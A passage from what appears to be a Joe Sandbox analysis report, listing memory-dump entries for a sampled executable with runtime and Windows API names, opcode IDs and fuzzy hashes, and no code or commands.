                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharMultiWide$_memmove
                                                                  • String ID:
                                                                  • API String ID: 3033907384-0
                                                                  • Opcode ID: 252ee3319a4d85e3c209b16d34ff45f8f13b3780b51a4beff575784a35d101d0
                                                                  • Instruction ID: dd140892eb519788f0442e518567294b3dfd7bd46ee8374fbb3508e89a7d65bf
                                                                  • Opcode Fuzzy Hash: 252ee3319a4d85e3c209b16d34ff45f8f13b3780b51a4beff575784a35d101d0
                                                                  • Instruction Fuzzy Hash: A701AD312112057FEB246A25ED8AF7B7FACEB9A360F10802AFD05CD1D0DA30D840C6B1
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2fba38e73cc786df114052526a585a10709a65af2730713f79c8937b60f13ca4
                                                                  • Instruction ID: faa99eaf47bde3d84e72810e74dac6dca99c6a1fa654ed287e440fd35eae8758
                                                                  • Opcode Fuzzy Hash: 2fba38e73cc786df114052526a585a10709a65af2730713f79c8937b60f13ca4
                                                                  • Instruction Fuzzy Hash: 6F51B234620206EFDF14EF58C990EBE77AAAF55310F188068EA46AB3D1CB30ED45CB54
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: 75d140205a4235c6eb2aef840014add38c5d91a755f9e4dbeb78bd4062a0867a
                                                                  • Instruction ID: f7d1e5e8a867fd649c48aa575a0727d8b2c3f64a2e3c838d59e59344786b9629
                                                                  • Opcode Fuzzy Hash: 75d140205a4235c6eb2aef840014add38c5d91a755f9e4dbeb78bd4062a0867a
                                                                  • Instruction Fuzzy Hash: 4C414C74514342CFDB15DF18C484B1ABBE0BF45318F0988ACEA959B3A2C732E885CF56
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: ClearVariant
                                                                  • String ID:
                                                                  • API String ID: 1473721057-0
                                                                  • Opcode ID: a8b9570fc418ae26b9cdc47f7d10d66b81e2acb4b55e9ba7fd3597fbd48e00d0
                                                                  • Instruction ID: 1c654fe9a5f2c7e92c688225a7b9a839e999559784bbdc36daa9de4b77045042
                                                                  • Opcode Fuzzy Hash: a8b9570fc418ae26b9cdc47f7d10d66b81e2acb4b55e9ba7fd3597fbd48e00d0
                                                                  • Instruction Fuzzy Hash: C4215570528342CFDB14DF14C844B1ABBE4BF88314F04886CFA96577A1D731E859CB92
                                                                  APIs
                                                                  • __lock_file.LIBCMT ref: 01284A16
                                                                    • Part of subcall function 01288CA8: __getptd_noexit.LIBCMT ref: 01288CA8
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: __getptd_noexit__lock_file
                                                                  • String ID:
                                                                  • API String ID: 2597487223-0
                                                                  • Opcode ID: 9b0400dc3cb3a639f51e38f68e39ffd422f2c915ddacbf348326da9e81a79ff5
                                                                  • Instruction ID: cb569573328096bdf84a6f59939097da152b6528ea68d54488404031f80e2978
                                                                  • Opcode Fuzzy Hash: 9b0400dc3cb3a639f51e38f68e39ffd422f2c915ddacbf348326da9e81a79ff5
                                                                  • Instruction Fuzzy Hash: 2AF0C231932287EBEF21BF748C047BFB6A1AF20325F448514E524AB1D0D7B88950DF51
                                                                  APIs
                                                                  • GetLongPathNameW.KERNEL32(?,?,00007FFF,?,?,?,0126741D,00000001,01326290,?,01263BCD,013252F8,013252E0,?,?), ref: 01280930
                                                                    • Part of subcall function 01267D2C: _memmove.LIBCMT ref: 01267D66
                                                                  Memory Dump Source
                                                                  • Source File: 0000000B.00000002.457263724.0000000001261000.00000020.00000001.01000000.00000006.sdmp, Offset: 01260000, based on PE: true
                                                                  • Associated: 0000000B.00000002.457258762.0000000001260000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.00000000012EF000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457280607.0000000001314000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457293519.000000000131E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 0000000B.00000002.457299222.0000000001327000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_11_2_1260000_name.jbxd
                                                                  Similarity
                                                                  • API ID: LongNamePath_memmove
                                                                  • String ID:
                                                                  • API String ID: 2514874351-0
                                                                  • Opcode ID: 9985b7ff24318cf696db66883e1b319c5513cba09ac2a8ced00b2f3c16b8a4bd
                                                                  • Instruction ID: aa86b554de6bdc6436a7305f71df08904f7180080c8b2252fdff3d6db41250b2
                                                                  • Opcode Fuzzy Hash: 9985b7ff24318cf696db66883e1b319c5513cba09ac2a8ced00b2f3c16b8a4bd
                                                                  • Instruction Fuzzy Hash: 4FE0CD3790012957C720D55CAC05FFA77EDDF886A0F0401B5FD0CD7248DA649C918690